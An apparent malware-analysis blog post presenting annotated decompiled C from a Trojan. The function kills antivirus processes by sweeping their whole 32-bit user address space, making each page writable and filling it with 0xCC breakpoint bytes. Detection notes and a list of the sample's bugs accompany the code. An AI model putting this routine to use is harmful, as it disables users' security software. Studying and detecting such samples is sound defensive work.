R3(用户态)进程清零法结束进程
所谓进程清零,网上资料很多。下面这段是分析一个 Trojan 样本时反编译出来的,Trojan 用它来结束杀毒软件进程。注意它实际写入的不是 0 而是 0xCC(x86 的 int 3 指令):目标进程一旦执行到被覆盖的代码就会因断点异常崩溃。呵呵。。。
/*
 * "Fill-zero" process kill, as recovered from a Trojan sample (2010-09-05).
 *
 * Hex-Rays style decompiler output, annotated for analysts. It is kept as
 * decompiled (including the decompiler's artificial `HMODULE result` type
 * punning and the IDA stack-slot comments) so it can be matched against the
 * original binary; it is evidence, not code meant to be built or reused.
 *
 * What it does: resolves ZwOpenProcess, ZwProtectVirtualMemory and
 * ZwWriteVirtualMemory from ntdll at run time, opens the target PID with full
 * access, then walks every 4 KiB page of the 32-bit user address space
 * (0x1000 .. 0x7FFFF000), marks it PAGE_EXECUTE_READWRITE and overwrites it
 * with 0xCC bytes. Despite the name it does NOT write zeros: 0xCC is the x86
 * `int 3` opcode, so any thread of the victim that executes overwritten code
 * raises a breakpoint exception and, with its data trashed as well, the
 * process is expected to die.
 *
 * Original author's note (translated): ZwProtectVirtualMemory and
 * ZwWriteVirtualMemory are not declared in the public SDK headers / import
 * library, so the caller has to resolve them itself (here via GetProcAddress;
 * the exports do exist in ntdll.dll). The prototypes the author reconstructed:
 *
 *   typedef NTSTATUS (*PZwProtectVirtualMemory)(IN HANDLE ProcessHandle,
 *                                               IN OUT PVOID *BaseAddress,
 *                                               IN OUT PULONG ProtectSize,
 *                                               IN ULONG NewProtect,
 *                                               OUT PULONG OldProtect);
 *
 *   typedef NTSTATUS (*PZwWriteVirtualMemory)(IN HANDLE ProcessHandle,
 *                                             IN PVOID BaseAddress,
 *                                             IN PVOID Buffer,
 *                                             IN ULONG BufferLength,
 *                                             OUT PULONG ReturnLength OPTIONAL);
 *
 *   typedef struct _OBJECT_ATTRIBUTES {
 *     ULONG Length;
 *     HANDLE RootDirectory;
 *     PUNICODE_STRING ObjectName;
 *     ULONG Attributes;
 *     PVOID SecurityDescriptor;
 *     PVOID SecurityQualityOfService;
 *   } OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;
 *   typedef CONST OBJECT_ATTRIBUTES *PCOBJECT_ATTRIBUTES;
 *
 * Detection / forensics notes (review):
 *   - The tell-tale pattern is one NtOpenProcess with access 0x1F0FFF on a
 *     security product's process, followed by roughly half a million
 *     NtProtectVirtualMemory(PAGE_EXECUTE_READWRITE) / NtWriteVirtualMemory
 *     pairs sweeping the victim's entire user range. Cross-process RWX
 *     protect+write from an unrelated image is worth alerting on by itself.
 *   - 0x1F0FFF is PROCESS_ALL_ACCESS as defined before Vista (newer SDKs use
 *     0x1FFFFF). The hard-coded 2 GiB range and 24-byte OBJECT_ATTRIBUTES mean
 *     the sample only targets 32-bit victims.
 *   - NOTE(review): on current Windows the open is expected to fail against AV
 *     services running as protected processes (PPL) — confirm per target.
 *
 * Bugs in the sample (deliberately left as-is):
 *   - CloseHandle() is called on the HMODULE returned by GetModuleHandleA. An
 *     HMODULE is a base address, not a kernel object handle, so the call
 *     fails; its BOOL is also the function's return value when any export is
 *     missing.
 *   - malloc() is unchecked and the buffer is never freed; the opened process
 *     handle is never closed.
 *   - OldProtect is typed as a 1-byte char but the callee writes a 4-byte
 *     ULONG through it (per the IDA offsets the slot at [bp-34h] is padded up
 *     to `i` at [bp-30h], so nothing else is clobbered), and the same slot is
 *     reused as ZwWriteVirtualMemory's ReturnLength out-parameter.
 *   - Size is an in/out parameter that is reused as the write length; with a
 *     page-aligned BaseAddress and a one-page Size it is not expected to grow,
 *     otherwise the write would over-read the 0x1000-byte Buffer.
 *   - Protect and write failures inside the loop are ignored.
 *
 * Parameters:
 *   nPID - process id of the victim (becomes CLIENT_ID.UniqueProcess).
 *
 * Returns (decompiler typed it HMODULE; it is really an integer):
 *   NULL if ntdll.dll is not mapped; CloseHandle()'s BOOL if any export is
 *   missing; ZwOpenProcess's NTSTATUS if the open failed; otherwise the
 *   address of the page after the last one processed (0x80000000).
 */
HMODULE __cdecl FillZeroToTerminateProcess(int nPID)
{
  HMODULE result; // eax@1
  /* CLIENT_ID laid out field by field on the stack: { UniqueProcess, UniqueThread } */
  int ClientId_UniqueProcess; // [sp+0h] [bp-4Ch]@6
  int ClientId_UniqueThread; // [sp+4h] [bp-48h]@6
  unsigned int pAddress; // [sp+8h] [bp-44h]@9
  void *Buffer; // [sp+Ch] [bp-40h]@6
  size_t Size; // [sp+10h] [bp-3Ch]@6
  HMODULE hModuleResult; // [sp+14h] [bp-38h]@6
  /* receives a ULONG from the callee despite being a char (see header) */
  char OldProtect; // [sp+18h] [bp-34h]@9
  unsigned int i; // [sp+1Ch] [bp-30h]@7
  HMODULE hObject; // [sp+20h] [bp-2Ch]@1
  FARPROC fnZwOpenProcess; // [sp+24h] [bp-28h]@2
  /* OBJECT_ATTRIBUTES laid out field by field on the stack (24 bytes, 32-bit) */
  unsigned int ObjectAttributes_Length; // [sp+28h] [bp-24h]@6
  int ObjectAttributes_RootDirectory; // [sp+2Ch] [bp-20h]@6
  int ObjectAttributes_ObjectName; // [sp+30h] [bp-1Ch]@6
  int ObjectAttributes_Attributes; // [sp+34h] [bp-18h]@6
  int ObjectAttributes_SecurityDescriptor; // [sp+38h] [bp-14h]@6
  int ObjectAttributes_SecurityQualityOfService; // [sp+3Ch] [bp-10h]@6
  int ProcessHandle; // [sp+40h] [bp-Ch]@6
  FARPROC fnZwProtectVirtualMemory; // [sp+44h] [bp-8h]@2
  FARPROC fnZwWriteVirtualMemory; // [sp+48h] [bp-4h]@2

  /* ntdll is always mapped, but the sample still bails out (returns NULL) if not */
  result = GetModuleHandleA("ntdll.dll");
  hObject = result;
  if ( result )
  {
    /* Runtime resolution of the Zw* syscall stubs: avoids an import-table
     * entry for them and sidesteps SDK headers that do not declare them. */
    fnZwOpenProcess = GetProcAddress(hObject, "ZwOpenProcess");
    fnZwProtectVirtualMemory = GetProcAddress(hObject, "ZwProtectVirtualMemory");
    fnZwWriteVirtualMemory = GetProcAddress(hObject, "ZwWriteVirtualMemory");
    if ( fnZwOpenProcess && fnZwProtectVirtualMemory && fnZwWriteVirtualMemory )
    {
      /* Misuse: hObject is an HMODULE, not a kernel handle; this call fails. */
      CloseHandle(hObject);
      /* Equivalent of InitializeObjectAttributes(&oa, NULL, 0, NULL, NULL):
       * Length = sizeof(OBJECT_ATTRIBUTES) on 32-bit, everything else zero. */
      ObjectAttributes_Length = 0x18u;
      ObjectAttributes_RootDirectory = 0;
      ObjectAttributes_ObjectName = 0;
      ObjectAttributes_Attributes = 0;
      ObjectAttributes_SecurityDescriptor = 0;
      ObjectAttributes_SecurityQualityOfService = 0;
      /* Open by PID: CLIENT_ID { UniqueProcess = nPID, UniqueThread = 0 } */
      ClientId_UniqueThread = 0;
      ClientId_UniqueProcess = nPID;
      /* One page of fill pattern. 204 == 0xCC == x86 `int 3`; this is what
       * actually lands in the victim, not zeros. malloc() is not checked. */
      Size = 0x1000u;
      Buffer = malloc(0x1000u);
      memset(Buffer, 204, 0x1000u);
      result = (HMODULE)((int (__stdcall *)(int *, unsigned int, unsigned int *, int *))fnZwOpenProcess)(
                 &ProcessHandle,
                 0x1F0FFFu, // PROCESS_ALL_ACCESS
                 &ObjectAttributes_Length,
                 &ClientId_UniqueProcess);
      hModuleResult = result;
      /* NT_SUCCESS(): NTSTATUS is non-negative on success */
      if ( (signed int)result >= 0 )
      {
        /* Sweep the whole 32-bit user address space one 4 KiB page at a
         * time, skipping the null page. Unmapped pages simply fail the
         * protect call below and are passed over. */
        for ( i = 0x1000u; i < 0x80000000; i += 0x1000u )
        {
          pAddress = i;
          /* Force the page RWX (0x40) so the write below is permitted
           * regardless of its original protection. BaseAddress and Size are
           * in/out and come back page-rounded. */
          hModuleResult = (HMODULE)((int (__stdcall *)(int, unsigned int *, size_t *, unsigned int, char *))fnZwProtectVirtualMemory)(
                            ProcessHandle,
                            &pAddress,
                            &Size,
                            0x40u, // PAGE_EXECUTE_READWRITE
                            &OldProtect);
          if ( (signed int)hModuleResult >= 0 )
            /* Overwrite the page with 0xCC. Status is discarded; &OldProtect
             * is (ab)used as the ReturnLength out-parameter. */
            ((void (__stdcall *)(int, unsigned int, void *, size_t, char *))fnZwWriteVirtualMemory)(
              ProcessHandle,
              pAddress,
              Buffer,
              Size,
              &OldProtect);
          /* address of the next page; ends up as the return value (0x80000000) */
          result = (HMODULE)(i + 0x1000);
        }
      }
    }
    else
    {
      /* Same HMODULE misuse as above; its BOOL becomes the return value. */
      result = (HMODULE)CloseHandle(hObject);
    }
  }
  return result;
}
2012-09-05
